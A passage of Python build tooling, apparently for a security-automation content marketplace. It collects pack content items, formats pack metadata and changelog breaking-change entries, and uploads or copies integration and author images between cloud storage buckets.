'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INCIDENT_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'playbook': content_item.get('playbookId', ''),
'closureScript': content_item.get('closureScript', ''),
'hours': int(content_item.get('hours', 0)),
'days': int(content_item.get('days', 0)),
'weeks': int(content_item.get('weeks', 0)),
})
elif current_directory == PackFolders.DASHBOARDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
})
elif current_directory == PackFolders.INDICATOR_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'type': content_item.get('type', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.REPORTS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INDICATOR_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'details': content_item.get('details', ''),
'reputationScriptName': content_item.get('reputationScriptName', ''),
'enhancementScriptNames': content_item.get('enhancementScriptNames', []),
})
elif current_directory == PackFolders.LAYOUTS.value:
layout_metadata = {
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
}
layout_description = content_item.get('description')
if layout_description is not None:
layout_metadata['description'] = layout_description
folder_collected_items.append(layout_metadata)
elif current_directory == PackFolders.CLASSIFIERS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name') or content_item.get('id', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.WIDGETS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'dataType': content_item.get('dataType', ''),
'widgetType': content_item.get('widgetType', ''),
})
elif current_directory == PackFolders.LISTS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', '')
})
elif current_directory == PackFolders.GENERIC_DEFINITIONS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif parent_directory == PackFolders.GENERIC_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
'type': content_item.get('type', ''),
})
elif current_directory == PackFolders.GENERIC_MODULES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif parent_directory == PackFolders.GENERIC_TYPES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.PREPROCESS_RULES.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.JOBS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
# note that `name` may technically be blank, but shouldn't pass validations
'name': content_item.get('name', ''),
'details': content_item.get('details', ''),
})
if current_directory in PackFolders.pack_displayed_items():
content_item_key = content_item_name_mapping[current_directory]
content_items_result[content_item_key] = \
content_items_result.get(content_item_key, []) + folder_collected_items
logging.success(f"Finished collecting content items for {self._pack_name} pack")
task_status = True
except Exception:
logging.exception(f"Failed collecting content items in {self._pack_name} pack")
finally:
self._content_items = content_items_result
return task_status
def load_user_metadata(self):
""" Loads user defined metadata and stores part of it's data in defined properties fields.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
user_metadata = {}
try:
user_metadata_path = os.path.join(self._pack_path, Pack.USER_METADATA) # user metadata path before parsing
if not os.path.exists(user_metadata_path):
logging.error(f"{self._pack_name} pack is missing {Pack.USER_METADATA} file.")
return task_status
with open(user_metadata_path, "r") as user_metadata_file:
user_metadata = json.load(user_metadata_file) # loading user metadata
# part of old packs are initialized with empty list
user_metadata = {} if isinstance(user_metadata, list) else user_metadata
# store important user metadata fields
self.support_type = user_metadata.get(Metadata.SUPPORT, Metadata.XSOAR_SUPPORT)
self.current_version = user_metadata.get(Metadata.CURRENT_VERSION, '')
self.hidden = user_metadata.get(Metadata.HIDDEN, False)
self.description = user_metadata.get(Metadata.DESCRIPTION, False)
self.display_name = user_metadata.get(Metadata.NAME, '') # type: ignore[misc]
self._user_metadata = user_metadata
self.eula_link = user_metadata.get(Metadata.EULA_LINK, Metadata.EULA_URL)
logging.info(f"Finished loading {self._pack_name} pack user metadata")
task_status = True
except Exception:
logging.exception(f"Failed in loading {self._pack_name} user metadata.")
finally:
return task_status
def _collect_pack_tags(self, user_metadata, landing_page_sections, trending_packs):
tags = set(input_to_list(input_data=user_metadata.get('tags')))
tags |= self._get_tags_from_landing_page(landing_page_sections)
tags |= {PackTags.TIM} if self._is_feed else set()
tags |= {PackTags.USE_CASE} if self._use_cases else set()
tags |= {PackTags.TRANSFORMER} if self._contains_transformer else set()
tags |= {PackTags.FILTER} if self._contains_filter else set()
if self._create_date:
days_since_creation = (datetime.utcnow() - datetime.strptime(self._create_date, Metadata.DATE_FORMAT)).days
if days_since_creation <= 30:
tags |= {PackTags.NEW}
else:
tags -= {PackTags.NEW}
if trending_packs:
if self._pack_name in trending_packs:
tags |= {PackTags.TRENDING}
else:
tags -= {PackTags.TRENDING}
return tags
def _enhance_pack_attributes(self, index_folder_path, pack_was_modified,
dependencies_data, statistics_handler=None, format_dependencies_only=False):
""" Enhances the pack object with attributes for the metadata file
Args:
dependencies_data (dict): mapping of pack dependencies data, of all levels.
format_dependencies_only (bool): Indicates whether the metadata formation is just for formatting the
dependencies or not.
Returns:
dict: parsed pack metadata.
"""
landing_page_sections = mp_statistics.StatisticsHandler.get_landing_page_sections()
displayed_dependencies = self.user_metadata.get(Metadata.DISPLAYED_IMAGES, [])
trending_packs = None
pack_dependencies_by_download_count = displayed_dependencies
if not format_dependencies_only:
# ===== Pack Regular Attributes =====
self._support_type = self.user_metadata.get(Metadata.SUPPORT, Metadata.XSOAR_SUPPORT)
self._support_details = self._create_support_section(
support_type=self._support_type, support_url=self.user_metadata.get(Metadata.URL),
support_email=self.user_metadata.get(Metadata.EMAIL)
)
self._author = self._get_author(
support_type=self._support_type, author=self.user_metadata.get(Metadata.AUTHOR, ''))
self._certification = self._get_certification(
support_type=self._support_type, certification=self.user_metadata.get(Metadata.CERTIFICATION)
)
self._legacy = self.user_metadata.get(Metadata.LEGACY, True)
self._create_date = self._get_pack_creation_date(index_folder_path)
self._update_date = self._get_pack_update_date(index_folder_path, pack_was_modified)
self._use_cases = input_to_list(input_data=self.user_metadata.get(Metadata.USE_CASES), capitalize_input=True)
self._categories = input_to_list(input_data=self.user_metadata.get(Metadata.CATEGORIES), capitalize_input=True)
self._keywords = input_to_list(self.user_metadata.get(Metadata.KEY_WORDS))
self._dependencies = self._parse_pack_dependencies(
self.user_metadata.get(Metadata.DEPENDENCIES, {}), dependencies_data)
# ===== Pack Private Attributes =====
if not format_dependencies_only:
self._is_private_pack = Metadata.PARTNER_ID in self.user_metadata
self._is_premium = self._is_private_pack
self._preview_only = get_valid_bool(self.user_metadata.get(Metadata.PREVIEW_ONLY, False))
self._price = convert_price(pack_id=self._pack_name, price_value_input=self.user_metadata.get('price'))
if self._is_private_pack:
self._vendor_id = self.user_metadata.get(Metadata.VENDOR_ID, "")
self._partner_id = self.user_metadata.get(Metadata.PARTNER_ID, "")
self._partner_name = self.user_metadata.get(Metadata.PARTNER_NAME, "")
self._content_commit_hash = self.user_metadata.get(Metadata.CONTENT_COMMIT_HASH, "")
# Currently all content packs are legacy.
# Since premium packs cannot be legacy, we directly set this attribute to false.
self._legacy = False
# ===== Pack Statistics Attributes =====
if not self._is_private_pack and statistics_handler: # Public Content case
self._pack_statistics_handler = mp_statistics.PackStatisticsHandler(
self._pack_name, statistics_handler.packs_statistics_df, statistics_handler.packs_download_count_desc,
displayed_dependencies
)
self._downloads_count = self._pack_statistics_handler.download_count
trending_packs = statistics_handler.trending_packs
pack_dependencies_by_download_count = self._pack_statistics_handler.displayed_dependencies_sorted
self._tags = self._collect_pack_tags(self.user_metadata, landing_page_sections, trending_packs)
self._search_rank = mp_statistics.PackStatisticsHandler.calculate_search_rank(
tags=self._tags, certification=self._certification, content_items=self._content_items
)
self._related_integration_images = self._get_all_pack_images(
self._displayed_integration_images, displayed_dependencies, dependencies_data,
pack_dependencies_by_download_count
)
def format_metadata(self, index_folder_path, packs_dependencies_mapping, build_number, commit_hash,
pack_was_modified, statistics_handler, pack_names=None, format_dependencies_only=False):
""" Re-formats metadata according to marketplace metadata format defined in issue #19786 and writes back
the result.
Args:
index_folder_path (str): downloaded index folder directory path.
packs_dependencies_mapping (dict): all packs dependencies lookup mapping.
build_number (str): circleCI build number.
commit_hash (str): current commit hash.
pack_was_modified (bool): Indicates whether the pack was modified or not.
statistics_handler (StatisticsHandler): The marketplace statistics handler
pack_names (set): List of all packs.
format_dependencies_only (bool): Indicates whether the metadata formation is just for formatting the
dependencies or not.
Returns:
bool: True is returned in case metadata file was parsed successfully, otherwise False.
bool: True is returned in pack is missing dependencies.
"""
task_status = False
pack_names = pack_names if pack_names else []
is_missing_dependencies = False
try:
self.set_pack_dependencies(packs_dependencies_mapping)
if Metadata.DISPLAYED_IMAGES not in self.user_metadata and self._user_metadata:
self._user_metadata[Metadata.DISPLAYED_IMAGES] = packs_dependencies_mapping.get(
self._pack_name, {}).get(Metadata.DISPLAYED_IMAGES, [])
logging.info(f"Adding auto generated display images for {self._pack_name} pack")
dependencies_data, is_missing_dependencies = \
self._load_pack_dependencies(index_folder_path, pack_names)
self._enhance_pack_attributes(
index_folder_path, pack_was_modified, dependencies_data, statistics_handler,
format_dependencies_only
)
formatted_metadata = self._parse_pack_metadata(build_number, commit_hash)
metadata_path = os.path.join(self._pack_path, Pack.METADATA) # deployed metadata path after parsing
json_write(metadata_path, formatted_metadata) # writing back parsed metadata
logging.success(f"Finished formatting {self._pack_name} packs's {Pack.METADATA} {metadata_path} file.")
task_status = True
except Exception as e:
logging.exception(f"Failed in formatting {self._pack_name} pack metadata. Additional Info: {str(e)}")
finally:
return task_status, is_missing_dependencies
@staticmethod
def pack_created_in_time_delta(pack_name, time_delta: timedelta, index_folder_path: str) -> bool:
"""
Checks if pack created before delta specified in the 'time_delta' argument and return boolean according
to the result
Args:
pack_name: the pack name.
time_delta: time_delta to check if pack was created before.
index_folder_path: downloaded index folder directory path.
Returns:
True if pack was created before the time_delta from now, and False otherwise.
"""
pack_creation_time_str = Pack._calculate_pack_creation_date(pack_name, index_folder_path)
return datetime.utcnow() - datetime.strptime(pack_creation_time_str, Metadata.DATE_FORMAT) < time_delta
def _get_pack_creation_date(self, index_folder_path):
return self._calculate_pack_creation_date(self._pack_name, index_folder_path)
@staticmethod
def _calculate_pack_creation_date(pack_name, index_folder_path):
""" Gets the pack created date.
Args:
index_folder_path (str): downloaded index folder directory path.
Returns:
datetime: Pack created date.
"""
created_time = datetime.utcnow().strftime(Metadata.DATE_FORMAT)
metadata = load_json(os.path.join(index_folder_path, pack_name, Pack.METADATA))
if metadata:
if metadata.get(Metadata.CREATED):
created_time = metadata.get(Metadata.CREATED, '')
else:
raise Exception(f'The metadata file of the {pack_name} pack does not contain "{Metadata.CREATED}" time')
return created_time
def _get_pack_update_date(self, index_folder_path, pack_was_modified):
""" Gets the pack update date.
Args:
index_folder_path (str): downloaded index folder directory path.
pack_was_modified (bool): whether the pack was modified or not.
Returns:
datetime: Pack update date.
"""
latest_changelog_released_date = datetime.utcnow().strftime(Metadata.DATE_FORMAT)
changelog = load_json(os.path.join(index_folder_path, self._pack_name, Pack.CHANGELOG_JSON))
if changelog and not pack_was_modified:
packs_latest_release_notes = max(LooseVersion(ver) for ver in changelog)
latest_changelog_version = changelog.get(packs_latest_release_notes.vstring, {})
latest_changelog_released_date = latest_changelog_version.get('released')
return latest_changelog_released_date
def set_pack_dependencies(self, packs_dependencies_mapping):
pack_dependencies = packs_dependencies_mapping.get(self._pack_name, {}).get(Metadata.DEPENDENCIES, {})
if Metadata.DEPENDENCIES not in self.user_metadata and self._user_metadata:
self._user_metadata[Metadata.DEPENDENCIES] = {}
# If it is a core pack, check that no new mandatory packs (that are not core packs) were added
# They can be overridden in the user metadata to be not mandatory so we need to check there as well
if self._pack_name in GCPConfig.CORE_PACKS_LIST:
mandatory_dependencies = [k for k, v in pack_dependencies.items()
if v.get(Metadata.MANDATORY, False) is True
and k not in GCPConfig.CORE_PACKS_LIST
and k not in self.user_metadata[Metadata.DEPENDENCIES].keys()]
if mandatory_dependencies:
raise Exception(f'New mandatory dependencies {mandatory_dependencies} were '
f'found in the core pack {self._pack_name}')
pack_dependencies.update(self.user_metadata[Metadata.DEPENDENCIES])
if self._user_metadata:
self._user_metadata[Metadata.DEPENDENCIES] = pack_dependencies
def prepare_for_index_upload(self):
""" Removes and leaves only necessary files in pack folder.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
files_to_leave = [Pack.METADATA, Pack.CHANGELOG_JSON, Pack.README]
try:
for file_or_folder in os.listdir(self._pack_path):
files_or_folder_path = os.path.join(self._pack_path, file_or_folder)
if file_or_folder in files_to_leave:
continue
if os.path.isdir(files_or_folder_path):
shutil.rmtree(files_or_folder_path)
else:
os.remove(files_or_folder_path)
task_status = True
except Exception:
logging.exception(f"Failed in preparing index for upload in {self._pack_name} pack.")
finally:
return task_status
@staticmethod
def _get_spitted_yml_image_data(root, target_folder_files):
""" Retrieves pack integration image and integration display name and returns binding image data.
Args:
root (str): full path to the target folder to search integration image.
target_folder_files (list): list of files inside the targeted folder.
Returns:
dict: path to integration image and display name of the integration.
"""
image_data = {}
for pack_file in target_folder_files:
if pack_file.startswith('.'):
continue
if pack_file.endswith('_image.png'):
image_data['repo_image_path'] = os.path.join(root, pack_file)
elif pack_file.endswith('.yml'):
with open(os.path.join(root, pack_file), 'r') as integration_file:
integration_yml = yaml.safe_load(integration_file)
image_data['display_name'] = integration_yml.get('display', '')
return image_data
def _get_image_data_from_yml(self, pack_file_path):
""" Creates temporary image file and retrieves integration display name.
Args:
pack_file_path (str): full path to the target yml_path integration yml to search integration image.
Returns:
dict: path to temporary integration image, display name of the integrations and the basename of
the integration in content_pack.zip.
"""
image_data = {}
if pack_file_path.endswith('.yml'):
with open(pack_file_path, 'r') as integration_file:
integration_yml = yaml.safe_load(integration_file)
image_data['display_name'] = integration_yml.get('display', '')
# create temporary file of base64 decoded data
integration_name = integration_yml.get('name', '')
base64_image = integration_yml['image'].split(',')[1] if integration_yml.get('image') else None
if not base64_image:
logging.warning(f"{integration_name} integration image was not found in {self._pack_name} pack")
return {}
temp_image_name = f'{integration_name.replace(" ", "")}_image.png'
temp_image_path = os.path.join(self._pack_path, temp_image_name)
with open(temp_image_path, 'wb') as image_file:
image_file.write(base64.b64decode(base64_image))
self._remove_files_list.append(temp_image_name) # add temporary file to tracking list
image_data['image_path'] = temp_image_path
image_data['integration_path_basename'] = os.path.basename(pack_file_path)
logging.info(f"Created temporary integration {image_data['display_name']} image for {self._pack_name} pack")
return image_data
def _search_for_images(self, target_folder):
""" Searches for png files in targeted folder.
Args:
target_folder (str): full path to directory to search.
Returns:
list: list of dictionaries that include image path and display name of integration, example:
[{'image_path': image_path, 'display_name': integration_display_name},...]
"""
target_folder_path = os.path.join(self._pack_path, target_folder)
images_list = []
if os.path.exists(target_folder_path):
for pack_item in os.scandir(target_folder_path):
image_data = self._get_image_data_from_yml(pack_item.path)
if image_data and image_data not in images_list:
images_list.append(image_data)
return images_list
def check_if_exists_in_index(self, index_folder_path):
""" Checks if pack is sub-folder of downloaded index.
Args:
index_folder_path (str): index folder full path.
Returns:
bool: whether the operation succeeded.
bool: whether pack exists in index folder.
"""
task_status, exists_in_index = False, False
try:
if not os.path.exists(index_folder_path):
logging.error(f"{GCPConfig.INDEX_NAME} does not exists.")
return task_status, exists_in_index
exists_in_index = os.path.exists(os.path.join(index_folder_path, self._pack_name))
task_status = True
except Exception:
logging.exception(f"Failed searching {self._pack_name} pack in {GCPConfig.INDEX_NAME}")
finally:
return task_status, exists_in_index
@staticmethod
def remove_contrib_suffix_from_name(display_name: str) -> str:
""" Removes the contribution details suffix from the integration's display name
Args:
display_name (str): The integration display name.
Returns:
str: The display name without the contrib details suffix
"""
contribution_suffixes = ('(Partner Contribution)', '(Developer Contribution)', '(Community Contribution)')
for suffix in contribution_suffixes:
index = display_name.find(suffix)
if index != -1:
display_name = display_name[:index].rstrip(' ')
break
return display_name
@staticmethod
def need_to_upload_integration_image(image_data: dict, integration_dirs: list, unified_integrations: list):
""" Checks whether needs to upload the integration image or not.
We upload in one of the two cases:
1. The integration_path_basename is one of the integration dirs detected
2. The integration_path_basename is one of the added/modified unified integrations
Args:
image_data (dict): path to temporary integration image, display name of the integrations and the basename of
the integration in content_pack.zip.
integration_dirs (list): The list of integrations to search in for images
unified_integrations (list): The list of unified integrations to upload their image
Returns:
bool: True if we need to upload the image or not
"""
integration_path_basename = image_data['integration_path_basename']
return any([
re.findall(BucketUploadFlow.INTEGRATION_DIR_REGEX, integration_path_basename)[0] in integration_dirs,
integration_path_basename in unified_integrations
])
def upload_integration_images(self, storage_bucket, storage_base_path, diff_files_list=None, detect_changes=False):
""" Uploads pack integrations images to gcs.
The returned result of integration section are defined in issue #19786.
Args:
storage_bucket (google.cloud.storage.bucket.Bucket): google storage bucket where image will be uploaded.
diff_files_list (list): The list of all modified/added files found in the diff
detect_changes (bool): Whether to detect changes or upload all images in any case.
Returns:
bool: whether the operation succeeded.
list: list of dictionaries with uploaded pack integration images.
"""
task_status = True
integration_images = []
integration_dirs = []
unified_integrations = []
try:
if detect_changes:
# detect added/modified integration images
for file in diff_files_list:
if self.is_integration_image(file.a_path):
# integration dir name will show up in the unified integration file path in content_packs.zip
integration_dirs.append(os.path.basename(os.path.dirname(file.a_path)))
elif self.is_unified_integration(file.a_path):
# if the file found in the diff is a unified integration we upload its image
unified_integrations.append(os.path.basename(file.a_path))
pack_local_images = self._search_for_images(target_folder=PackFolders.INTEGRATIONS.value)
if not pack_local_images:
return True # return empty list if no images were found
pack_storage_root_path = os.path.join(storage_base_path, self._pack_name)
for image_data in pack_local_images:
image_path = image_data.get('image_path')
if not image_path:
raise Exception(f"{self._pack_name} pack integration image was not found")
image_name = os.path.basename(image_path)
image_storage_path = os.path.join(pack_storage_root_path, image_name)
pack_image_blob = storage_bucket.blob(image_storage_path)
if not detect_changes or \
self.need_to_upload_integration_image(image_data, integration_dirs, unified_integrations):
# upload the image if needed
logging.info(f"Uploading image: {image_name} of integration: {image_data.get('display_name')} "
f"from pack: {self._pack_name}")
with open(image_path, "rb") as image_file:
pack_image_blob.upload_from_file(image_file)
self._uploaded_integration_images.append(image_name)
if GCPConfig.USE_GCS_RELATIVE_PATH:
image_gcs_path = urllib.parse.quote(
os.path.join(GCPConfig.IMAGES_BASE_PATH, self._pack_name, image_name))
else:
image_gcs_path = pack_image_blob.public_url
integration_name = image_data.get('display_name', '')
if self.support_type != Metadata.XSOAR_SUPPORT:
integration_name = self.remove_contrib_suffix_from_name(integration_name)
integration_images.append({
'name': integration_name,
'imagePath': image_gcs_path
})
if self._uploaded_integration_images:
logging.info(f"Uploaded {len(self._uploaded_integration_images)} images for {self._pack_name} pack.")
except Exception as e:
task_status = False
logging.exception(f"Failed to upload {self._pack_name} pack integration images. Additional Info: {str(e)}")
finally:
self._displayed_integration_images = integration_images
return task_status
def copy_integration_images(self, production_bucket, build_bucket, images_data, storage_base_path, build_bucket_base_path):
""" Copies all pack's integration images from the build bucket to the production bucket
Args:
production_bucket (google.cloud.storage.bucket.Bucket): The production bucket
build_bucket (google.cloud.storage.bucket.Bucket): The build bucket
images_data (dict): The images data structure from Prepare Content step
Returns:
bool: Whether the operation succeeded.
"""
task_status = True
num_copied_images = 0
err_msg = f"Failed copying {self._pack_name} pack integrations images."
pc_uploaded_integration_images = images_data.get(self._pack_name, {}).get(BucketUploadFlow.INTEGRATIONS, [])
for image_name in pc_uploaded_integration_images:
build_bucket_image_path = os.path.join(build_bucket_base_path, self._pack_name, image_name)
build_bucket_image_blob = build_bucket.blob(build_bucket_image_path)
if not build_bucket_image_blob.exists():
logging.error(f"Found changed/added integration image {image_name} in content repo but "
f"{build_bucket_image_path} does not exist in build bucket")
task_status = False
else:
logging.info(f"Copying {self._pack_name} pack integration image: {image_name}")
try:
copied_blob = build_bucket.copy_blob(
blob=build_bucket_image_blob, destination_bucket=production_bucket,
new_name=os.path.join(storage_base_path, self._pack_name, image_name)
)
if not copied_blob.exists():
logging.error(f"Copy {self._pack_name} integration image: {build_bucket_image_blob.name} "
f"blob to {copied_blob.name} blob failed.")
task_status = False
else:
num_copied_images += 1
except Exception as e:
logging.exception(f"{err_msg}. Additional Info: {str(e)}")
return False
if not task_status:
logging.error(err_msg)
else:
if num_copied_images == 0:
logging.info(f"No added/modified integration images were detected in {self._pack_name} pack.")
else:
logging.success(f"Copied {num_copied_images} images for {self._pack_name} pack.")
return task_status
def upload_author_image(self, storage_bucket, storage_base_path, diff_files_list=None, detect_changes=False):
""" Uploads pack author image to gcs.
Searches for `Author_image.png` and uploads author image to gcs. In case no such image was found,
default Base pack image path is used and it's gcp path is returned.
Args:
storage_bucket (google.cloud.storage.bucket.Bucket): gcs bucket where author image will be uploaded.
storage_base_path (str): the path under the bucket to upload to.
diff_files_list (list): The list of all modified/added files found in the diff
detect_changes (bool): Whether to detect changes or upload the author image in any case.
Returns:
bool: whether the operation succeeded.
str: public gcp path of author image.
"""
task_status = True
author_image_storage_path = ""
try:
author_image_path = os.path.join(self._pack_path, Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
if os.path.exists(author_image_path):
image_to_upload_storage_path = os.path.join(storage_base_path, self._pack_name,
Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
pack_author_image_blob = storage_bucket.blob(image_to_upload_storage_path)
if not detect_changes or any(self.is_author_image(file.a_path) for file in diff_files_list):
# upload the image if needed
with open(author_image_path, "rb") as author_image_file:
pack_author_image_blob.upload_from_file(author_image_file)
self._uploaded_author_image = True
logging.success(f"Uploaded successfully {self._pack_name} pack author image")
if GCPConfig.USE_GCS_RELATIVE_PATH:
author_image_storage_path = urllib.parse.quote(
os.path.join(GCPConfig.IMAGES_BASE_PATH, self._pack_name, Pack.AUTHOR_IMAGE_NAME))
else:
author_image_storage_path = pack_author_image_blob.public_url
elif self.support_type == Metadata.XSOAR_SUPPORT: # use default Base pack image for xsoar supported packs
author_image_storage_path = os.path.join(GCPConfig.IMAGES_BASE_PATH, GCPConfig.BASE_PACK,
Pack.AUTHOR_IMAGE_NAME) # disable-secrets-detection
if not GCPConfig.USE_GCS_RELATIVE_PATH:
# disable-secrets-detection-start
author_image_storage_path = os.path.join(GCPConfig.GCS_PUBLIC_URL, storage_bucket.name,
author_image_storage_path)
# disable-secrets-detection-end
logging.info((f"Skipping uploading of {self._pack_name} pack author image "
f"and use default {GCPConfig.BASE_PACK} pack image"))
else:
logging.info(f"Skipping uploading of {self._pack_name} pack author image. "
f"The pack is defined as {self.support_type} support type")
except Exception:
logging.exception(f"Failed uploading {self._pack_name} pack author image.")
task_status = False
author_image_storage_path = ""
finally:
self._author_image = author_image_storage_path
return task_status
def copy_author_image(self, production_bucket, build_bucket, images_data, storage_base_path, build_bucket_base_path):
""" Copies pack's author image from the build bucket to the production bucket
Searches for `Author_image.png`, In case no such image was found, default Base pack image path is used and
it's gcp path is returned.
Args:
production_bucket (google.cloud.storage.bucket.Bucket): The production bucket
build_bucket (google.cloud.storage.bucket.Bucket): The build bucket
images_data (dict): The images data structure from Prepare Content step
Returns:
bool: Whether the operation succeeded.
"""
if images_data.get(self._pack_name, {}).get(BucketUploadFlow.AUTHOR, False):
build_author_image_path = os.path.join(build_bucket_base_path, self._pack_name, Pack.AUTHOR_IMAGE_NAME)
build_author_image_blob = build_bucket.blob(build_author_image_path)
if build_author_image_blob.exists():
try:
copied_blob = build_bucket.copy_blob(
blob=build_author_image_blob, destination_bucket=production_bucket,
new_name=os.path.join(storage_base_path, self._pack_name,
Pack.AUTHOR_IMAGE_NAME))
if not copied_blob.exists():
logging.error(f"Failed copying {self._pack_name} pack author image.")
return False
else:
logging.success(f"Copied successfully {self._pack_name} pack author image.")
return True
except Exception as e:
logging.exception(f"Failed copying {Pack.AUTHOR_IMAGE_NAME} for {self._pack_name} pack. "
f"Additional Info: {str(e)}")
return False
else:
logging.error(f"Found changed/added author image in content repo for {self._pack_name} pack but "
f"image does not exist in build bucket in path {build_author_image_path}.")
return False
else:
logging.info(f"No added/modified author image was detected in {self._pack_name} pack.")
return True
def cleanup(self):
""" Finalization action, removes extracted pack folder.
"""
if os.path.exists(self._pack_path):
shutil.rmtree(self._pack_path)
logging.info(f"Cleanup {self._pack_name} pack from: {self._pack_path}")
def is_changelog_exists(self):
""" Indicates whether the local changelog of a given pack exists or not
Returns:
bool: The answer
"""
return os.path.isfile(os.path.join(self._pack_path, Pack.CHANGELOG_JSON))
def is_failed_to_upload(self, failed_packs_dict):
"""
Checks if the pack was failed to upload in Prepare Content step in Create Instances job
Args:
failed_packs_dict (dict): The failed packs file
Returns:
bool: Whether the operation succeeded.
str: The pack's failing status
"""
if self._pack_name in failed_packs_dict:
return True, failed_packs_dict[self._pack_name].get('status')
else:
return False, str()
def is_integration_image(self, file_path: str):
""" Indicates whether a file_path is an integration image or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is an integration image or False otherwise
"""
return all([
file_path.startswith(os.path.join(PACKS_FOLDER, self._pack_name)),
file_path.endswith('.png'),
'image' in os.path.basename(file_path.lower()),
os.path.basename(file_path) != Pack.AUTHOR_IMAGE_NAME
])
def is_author_image(self, file_path: str):
""" Indicates whether a file_path is an author image or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is an author image or False otherwise
"""
return file_path == os.path.join(PACKS_FOLDER, self._pack_name, Pack.AUTHOR_IMAGE_NAME)
def is_unified_integration(self, file_path: str):
""" Indicates whether a file_path is a unified integration yml file or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is a unified integration or False otherwise
"""
return all([
file_path.startswith(os.path.join(PACKS_FOLDER, self._pack_name, PackFolders.INTEGRATIONS.value)),
os.path.basename(os.path.dirname(file_path)) == PackFolders.INTEGRATIONS.value,
os.path.basename(file_path).startswith('integration'),
os.path.basename(file_path).endswith('.yml')
])
def add_bc_entries_if_needed(self, release_notes_dir: str, changelog: Dict[str, Any]) -> None:
"""
Receives changelog, checks if there exists a BC version in each changelog entry (as changelog entry might be
zipped into few RN versions, check if at least one of the versions is BC).
Check if RN is BC is done by doing the following:
1) Check if RN has corresponding config file, e.g 1_0_1.md has corresponding 1_0_1.json file.
2) If it does, check if `isBreakingChanges` field is true
If such version exists, adds a
true value to 'breakingChanges' field.
if JSON file also has breakingChangesNotes configures, adds `breakingChangesNotes` field to changelog file.
This function iterates every entry in changelog because it takes into consideration four scenarios:
a) Entry without breaking changes, changes to entry with breaking changes (because at least one of the
versions in the entry was marked as breaking changes).
b) Entry without breaking changes, does not change.
c) Entry with breaking changes, changes to entry without breaking changes (because all the BC versions
corresponding to the changelog entry were re-marked as not BC).
d) Entry with breaking changes, does not change.
Args:
release_notes_dir (str): RN dir path.
changelog (Dict[str, Any]): Changelog data represented as a dict.
Returns:
(None): Modifies changelog, adds bool value to 'breakingChanges' and `breakingChangesNotes` fields to every
changelog entry, according to the logic described above.
"""
if not os.path.exists(release_notes_dir):
return
bc_version_to_text: Dict[str, Optional[str]] = self._breaking_changes_versions_to_text(release_notes_dir)
loose_versions: List[LooseVersion] = [LooseVersion(bc_ver) for bc_ver in bc_version_to_text]
predecessor_version: LooseVersion = LooseVersion('0.0.0')
for changelog_entry in sorted(changelog.keys(), key=LooseVersion):
rn_loose_version: LooseVersion = LooseVersion(changelog_entry)
if bc_versions := self._changelog_entry_bc_versions(predecessor_version, rn_loose_version, loose_versions,
bc_version_to_text):
logging.info(f'Changelog entry {changelog_entry} contains BC versions')
changelog[changelog_entry]['breakingChanges'] = True
if bc_text := self._calculate_bc_text(release_notes_dir, bc_versions):
changelog[changelog_entry]['breakingChangesNotes'] = bc_text
else:
changelog[changelog_entry].pop('breakingChangesNotes', None)
else:
changelog[changelog_entry].pop('breakingChanges', None)
predecessor_version = rn_loose_version
def _calculate_bc_text(self, release_notes_dir: str, bc_version_to_text: Dict[str, Optional[str]]) -> Optional[str]:
"""
Receives BC versions to text dict for current changelog entry. Calculates text for BC entry.
Args:
release_notes_dir (str): RN dir path.
bc_version_to_text (Dict[str, Optional[str]): {bc version, bc_text}
Returns:
(Optional[str]): Text for entry if such was added.
If none is returned, server will list the full RN as the BC notes instead.
"""
# Handle cases of one BC version in entry.
if len(bc_version_to_text) == 1:
return list(bc_version_to_text.values())[0]
# Handle cases of two or more BC versions in entry.
text_of_bc_versions, bc_without_text = self._split_bc_versions_with_and_without_text(bc_version_to_text)
# Case one: Not even one BC version contains breaking text.
if len(text_of_bc_versions) == 0:
return None
# Case two: Only part of BC versions contains breaking text.
elif len(text_of_bc_versions) < len(bc_version_to_text):
return self._handle_many_bc_versions_some_with_text(release_notes_dir, text_of_bc_versions, bc_without_text)
# Case 3: All BC versions contains text.
else:
# Important: Currently, implementation of aggregating BCs was decided to concat between them
# In the future this might be needed to re-thought.
return '\n'.join(bc_version_to_text.values()) # type: ignore[arg-type]
def _handle_many_bc_versions_some_with_text(self, release_notes_dir: str, text_of_bc_versions: List[str],
bc_versions_without_text: List[str], ) -> str:
"""
Calculates text for changelog entry where some BC versions contain text and some don't.
Important: Currently, implementation of aggregating BCs was decided to concat between them (and if BC version
does not have a BC text - concat the whole RN). In the future this might be needed to re-thought.
Args:
release_notes_dir (str): RN dir path.
text_of_bc_versions ([List[str]): List of text of BC versions with text.
